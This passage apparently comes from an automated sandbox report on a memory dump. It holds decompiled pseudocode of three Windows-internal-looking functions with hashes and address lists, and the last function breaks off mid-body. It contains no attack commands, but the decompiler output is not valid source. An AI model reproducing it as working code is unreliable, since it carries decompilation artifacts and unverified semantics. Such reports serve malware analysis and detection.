Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc5cb31c509072d080289d252a3c5b2aa6d024332f77ea1ec1fe846742d30994
Instruction ID: d66fac8d10fb98a7d1ad83599446b7e9b83d13c72949892c942ab18a606a7e91
Opcode Fuzzy Hash: cc5cb31c509072d080289d252a3c5b2aa6d024332f77ea1ec1fe846742d30994
Instruction Fuzzy Hash: 87E1F174A0175AEFEB35CF68C980BA9B7F5BF85304F04019DDA0E9B291D734A981CB61

Uniqueness

Uniqueness Score: -1.00%

Function 019F849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E019F849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x1abf9c0);
				E01A3D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1ad7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E019FCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01A02280( *[fs:0x30], 0x1ad8550);
						_t139 =  *0x1ad7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E01A1F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E019FFFB0(_t193, _t235, 0x1ad8550);
								L5:
								return E01A3D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E019E1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1ad7b9c; // 0x0
							_t235 = L01A04620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1ad7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E01A1A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E019FFFB0(_t193, _t235, 0x1ad8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L01A077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L01A077F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1ad7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1ad7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E01A237C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1ad7b9c; // 0x0
									_t214 = L01A04620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E01A237F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1ad7b10 =  *0x1ad7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1ad7b04 =  *0x1ad7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L01A077F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L01A077F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1ad7b08 =  *0x1ad7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E01A257C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E01A2F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L01A077F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E01A1A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L01A077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E01A296C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x019f849b
0x019f849b
0x019f849b
0x019f849b
0x019f849d
0x019f84a2
0x019f84a7
0x019f84b1
0x019f84d8
0x00000000
0x019f84b3
0x019f84c4
0x019f84c9
0x019f84cd
0x019f84cf
0x019f84cf
0x019f84d6
0x019f84e6
0x019f84e9
0x019f84ec
0x019f84ef
0x019f84f2
0x019f84f4
0x019f84fc
0x019f8501
0x019f8506
0x019f8509
0x019f86e0
0x019f86e5
0x019f86e8
0x019f86ed
0x019f86f0
0x019f86f2
0x01a49afd
0x01a49b02
0x019f84da
0x019f84df
0x019f84df
0x019f86fa
0x019f86fd
0x019f86fe
0x019f8701
0x019f8706
0x019f8709
0x019f870b
0x00000000
0x00000000
0x019f8711
0x019f8725
0x019f8727
0x019f872a
0x019f872c
0x01a49af0
0x01a49af5
0x019f8732
0x019f8732
0x019f8732
0x019f8735
0x019f8737
0x019f8515
0x019f8515
0x019f8518
0x019f851d
0x019f8523
0x019f8527
0x019f852b
0x019f8537
0x019f8539
0x019f853c
0x019f853e
0x019f868c
0x019f8691
0x019f8699
0x019f869b
0x019f8744
0x019f8748
0x019f86a1
0x019f86a1
0x019f86a1
0x019f86a4
0x019f86a8
0x01a49bdf
0x01a49bdf
0x019f86ae
0x019f86b0
0x00000000
0x019f86b6
0x00000000
0x01a49be9
0x019f86b0
0x019f8544
0x019f854a
0x019f854d
0x019f8551
0x019f876e
0x019f8778
0x019f877b
0x019f8780
0x019f8557
0x019f8557
0x019f855d
0x019f855d
0x019f856b
0x019f856e
0x019f8570
0x019f8573
0x019f8576
0x019f8576
0x019f8579
0x019f857b
0x00000000
0x00000000
0x019f8581
0x019f85a0
0x019f85a2
0x019f85a5
0x019f85a7
0x01a49b1b
0x01a49b1b
0x019f862e
0x019f862e
0x019f8631
0x019f8631
0x019f8634
0x019f8636
0x019f8669
0x019f8669
0x019f866b
0x01a49bbf
0x01a49bc4
0x01a49bc8
0x01a49bce
0x01a49bce
0x019f8671
0x019f8671
0x019f8674
0x019f8676
0x01a49bae
0x01a49bae
0x019f8676
0x019f867c
0x019f867e
0x019f8688
0x019f8688
0x00000000
0x019f867e
0x019f8638
0x019f8638
0x019f863b
0x019f863e
0x019f863f
0x019f8642
0x019f8645
0x019f8648
0x019f864d
0x01a49b69
0x01a49b6e
0x01a49b7b
0x01a49b81
0x01a49b85
0x01a49b89
0x01a49ba7
0x01a49b8b
0x01a49b91
0x01a49b9a
0x01a49b9f
0x01a49b9f
0x019f8788
0x019f878d
0x019f8763
0x019f8763
0x019f8766
0x00000000
0x019f8766
0x01a49b70
0x00000000
0x01a49b70
0x019f8656
0x019f865a
0x019f865c
0x019f8752
0x019f8756
0x00000000
0x00000000
0x019f875e
0x00000000
0x019f875e
0x019f8662
0x019f8662
0x019f8662
0x019f8666
0x00000000
0x019f8666
0x019f85b7
0x019f85b9
0x019f85bc
0x019f85bf
0x019f85cc
0x019f85d1
0x019f85d4
0x019f85db
0x019f85de
0x019f85e0
0x01a49b5f
0x00000000
0x01a49b5f
0x019f85e6
0x019f85ea
0x019f86c3
0x019f86c5
0x019f86c8
0x019f86ca
0x01a49b16
0x00000000
0x01a49b16
0x019f86d6
0x019f85f6
0x019f85f6
0x019f85f9
0x019f8602
0x019f8606
0x019f860a
0x019f860b
0x019f860e
0x019f8611
0x00000000
0x019f8611
0x019f85f3
0x00000000
0x019f85f3
0x019f8619
0x019f861e
0x019f861e
0x019f8621
0x019f8622
0x019f8623
0x019f8625
0x019f862c
0x00000000
0x019f873d
0x00000000
0x019f873d
0x019f8737
0x019f850f
0x019f8512
0x00000000
0x019f8512
0x00000000
0x019f84d6

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a099d3a37dd5630510b1152dd054758c389319f8875a60f75ee8dcadffe15294
Instruction ID: 0b19fb29e39c72335fafc1a427145a3aca65cb1efc29e9903b83e248b92afafe
Opcode Fuzzy Hash: a099d3a37dd5630510b1152dd054758c389319f8875a60f75ee8dcadffe15294
Instruction Fuzzy Hash: D2B15F74E00209EFDB15DFD9C984AAEBBB9BF88304F10452DE60AAB345D770A956CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A1513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E01A1513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x1add360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E01A2D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01A02280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01A04620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E01A2F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E019FFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x1adb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E01A2B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x01a15142
0x01a1514c
0x01a15150
0x01a15157
0x01a15159
0x01a1515e
0x01a15165
0x01a15169
0x01a1516c
0x01a15172
0x01a15176
0x01a1517a
0x01a1517a
0x01a1517a
0x01a1517f
0x01a56d8b
0x01a56d8e
0x01a56d91
0x01a56d95
0x01a56d98
0x01a56d9c
0x01a56da0
0x01a56da3
0x01a56da7
0x01a56e26
0x01a56e26
0x01a56e2a
0x01a151f9
0x01a151f9
0x01a151fe
0x01a56e33
0x01a56e33
0x01a56e39
0x01a56e3d
0x01a56e46
0x01a56e50
0x00000000
0x00000000
0x01a56e52
0x01a56e53
0x01a56e56
0x01a56e5d
0x00000000
0x00000000
0x00000000
0x01a56e5f
0x01a56e67
0x01a56e77
0x01a56e7f
0x01a56e80
0x01a56e88
0x01a56e90
0x01a56e9f
0x01a56ea5
0x01a56ea9
0x01a56eb1
0x01a56ebf
0x00000000
0x00000000
0x01a56ecf
0x01a56ed3
0x00000000
0x00000000
0x01a56edb
0x01a56ede
0x01a56ee1
0x01a56ee8
0x01a56eeb
0x01a56eed
0x01a56ef0
0x01a56ef4
0x01a56ef8
0x01a56efc
0x00000000
0x00000000
0x01a56f0d
0x01a56f11
0x01a56f32
0x01a56f37
0x01a56f3b
0x01a56f3e
0x01a56f41
0x01a56f46
0x00000000
0x00000000
0x01a56f4c
0x01a56f50
0x01a56f50
0x01a56f54
0x01a56f62
0x01a56f65
0x01a56f6d
0x01a56f7b
0x01a56f7b
0x01a56f93
0x01a56f98
0x01a56fa0
0x01a56fa6
0x01a56fb3
0x01a56fb6
0x01a56fbf
0x01a56fc1
0x01a56fd5
0x01a56fda
0x01a56fda
0x01a56fdd
0x01a56fe2
0x01a56fe7
0x01a56feb
0x01a56fef
0x01a56ff3
0x01a1520c
0x01a1520c
0x01a1520f
0x01a15215
0x01a15234
0x01a1523a
0x01a1523a
0x01a15244
0x01a15245
0x01a15246
0x01a15251
0x01a15251
0x01a56f13
0x01a56f17
0x01a56f17
0x01a56f18
0x01a56f1b
0x01a56f1f
0x01a56f23
0x00000000
0x01a56f28
0x01a15204
0x01a15204
0x01a15208
0x00000000
0x01a15208
0x01a15185
0x01a15188
0x01a1518a
0x01a1518e
0x01a15195
0x01a56db1
0x01a56db5
0x01a56db9
0x01a1519b
0x01a1519b
0x01a1519e
0x01a151a7
0x01a151a9
0x01a151a9
0x01a151b5
0x01a151b8
0x01a151bb
0x01a151be
0x01a151c1
0x01a151c5
0x01a151c9
0x01a151cd
0x01a151cd
0x01a151d8
0x01a151dc
0x01a151e0
0x01a56dcc
0x01a56dd0
0x01a56dd5
0x01a56ddd
0x01a56de1
0x01a56de1
0x01a56de5
0x01a56deb
0x01a56df1
0x01a56df7
0x01a56dfd
0x01a56e01
0x01a56e05
0x01a56e09
0x01a56e0d
0x01a56e11
0x01a56e11
0x01a151eb
0x01a56e1a
0x01a56e1f
0x01a56e21
0x01a56e23
0x00000000
0x01a151f1
0x01a151f1
0x00000000
0x01a151f1

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a420a62ef15b7074bbb658080bee256f4d7c3b526c70c1cac3860842e0a0a77b
Instruction ID: c1f675c9d502bb87f3d1594ead7e592bf50ab73dbd68ee3c061c72a2a8f531d8
Opcode Fuzzy Hash: a420a62ef15b7074bbb658080bee256f4d7c3b526c70c1cac3860842e0a0a77b
Instruction Fuzzy Hash: D3C143B55093818FD355CF28C580A5AFBF1BF89304F588A6EF9998B352D770E885CB42

Uniqueness

Uniqueness Score: -1.00%

Function 01A103E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E01A103E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x1add360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01A10548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E01A2B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E019FB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1ad7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01A07D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01A07D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01A67016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01A29830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E01A669A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1ad7c04 != 0) {
						_t118 = _v12;
						_t120 = E01A6A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1ad7bd8;
						if( *0x1ad7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E01A295D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E01A299A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01A63540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E019EB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
